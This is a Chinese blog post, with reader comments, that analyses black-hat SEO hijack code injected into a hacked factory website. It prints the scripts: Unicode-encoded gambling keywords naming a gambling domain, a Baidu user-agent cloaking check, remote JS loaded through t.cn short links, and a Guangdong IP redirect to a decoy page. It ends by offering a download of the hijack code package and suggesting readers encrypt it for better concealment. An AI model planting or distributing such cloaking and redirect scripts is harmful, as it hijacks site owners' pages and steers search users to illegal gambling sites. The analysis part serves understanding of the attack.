直接入正题,贴上被入侵网站index.html里面head头部代码。
我们看title标题部分,代码如下:
[/reply]
是不是看不懂。这个代码是Unicode编码的,我们用工具把Unicode编码成中文看下。
[/reply]
顺便把keywords关键词和description描述的Unicode编码转码一下吧。
[reply]
关键词:十大正规赌博网站坚持专业、最贴心的服务宗旨,每一位玩家都可以在这里接受顶级品牌的服务十大正规赌博网站所有细节都追求最完美的用户体验。
描述:网上十大正规赌博平台【www.js29118.com】,正规赌博网站有,正规十大赌博网站排名欢迎您,收录正规平台,正规十大赌博网站排名年度亚洲区重点推荐信誉博彩网上十大正规赌博平台。
[/reply]
现在看得懂鸟语了吧!
接下来继续看代码。
来了一个JS。
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf(“baidu”) == -1){document.title =”超冷、深冷、超深冷、超冷处理-东莞市有容超冷五金配件加工厂”}</script>
这个JS是判断来路的,如果不是百度来的就显示“超冷、深冷、超深冷、超冷处理-东莞市有容超冷五金配件加工厂”。如果是的那就显示Unicode编码转码的
下面还是JS。
<script language=”javascript” src=”http://t.cn/RBAcEC8″></script>[/reply]
把网址复制到浏览器打开显示如下。
此网址http://t.cn/RBAcEC8直接变成了https://www.bcdas8.com/dq.js,[/reply]
其实是一段JS,JS下面又有一个网址https://pv.sohu.com/cityjson?ie=utf-8,复制到浏览器中打开显示如下。
终于有点眉目了。他自己的网站报毒于是生成一个短网址来欺骗搜索引擎,变成一个百度认可的短网址。这个网页中是执行一条JS,用来判断IP地区来路的。我是在东莞的IP,显示是广东省东莞市,如果你是其他地方他会显示其他地方。所以看到以上图片可能和你实际验证的时候有地域差别。这个判断来路的JS其实是搜狐提供的,他调用了。
接下来是这句代码<script>var sf=returnCitySN[“cname”]; if(sf.indexOf(“广东省”)>=0){window.location.href=”/indax.html”;}</script>
这个代码的意思是如果你的IP是广东省的那么页面直接跳转到indax.html,不是的直接运行下面的代码。
<script language=”javascript” src=”http://t.cn/RBASXKi”></script>[/reply]
又是一个JS,把网址复制到浏览器中查看。
这又是通过短段码伪装成信任网站的危险网站的JS,里面是百度和360推送的网址。目的就是发挥它的余热,临走之前再推送一次百度和360,并做了标记识别,知道是哪个网址来的。
?88是他的识别码,黑客自己设置的有一定对应关系的,用来统计来源的。下面的代码就没什么了的了。
简单总结一下。
1、此代码具有2重隐蔽性。第一重:正常直接访问不跳转,伪装成正常网站的标题。第二重:你是广东IP访问直接跳转到indax.html,这个是正常网页。如果站长是在广东,你根本发现不了,就算你是通过百度搜索去点击。
2、代码加入了地区判断验证和一般的有点区别。
3、代码用短网址过滤风险提示。
4、代码用Unicode编码来伪装自己。
5、代码进行了百度和360推送。
6、跳转加入了随机跳转,但写的网站都是同一个。
7、不足之处只做了百度来路的,其他搜索引擎的没做。
黑帽劫持JS代码打包下载地址链接:
注:以上代码过于简单粗暴,伪装的不够隐蔽,可以参看下面推荐阅读文章,自行加密处理。
推荐阅读:
仅从黑帽SEO技术研究!黑帽变黑产,暗流涌动,瞬间起飞了
因为文章中涉及到敏感词汇,所有需要回复才可以查看,请各位谅解。
不错,分析的很透彻。博主辛苦了
这种黑帽做法牛逼,普通人玩不转呀。
厉害,讲的很好
厉害,讲的很好
需自行车在三十
沙发上
来学些
看看大神的技术
回复了哈哈哈
牛逼!大赞
来了
好好好牛的
终于明白了这个黑帽手法了,花了我一个小时仔细来研究。
是我需要的
为什么看不到
回复、刷新就可以看到了
研究下新技术,学习。
我要看到 内容
辛苦了博主
牛皮
学习学习 谢谢大佬
有意向购买
恢复一下
挺好的
牛牛牛
学习
再试一次
可以
666可以的
瞻仰大神
66666666666666666哈
瞻仰大神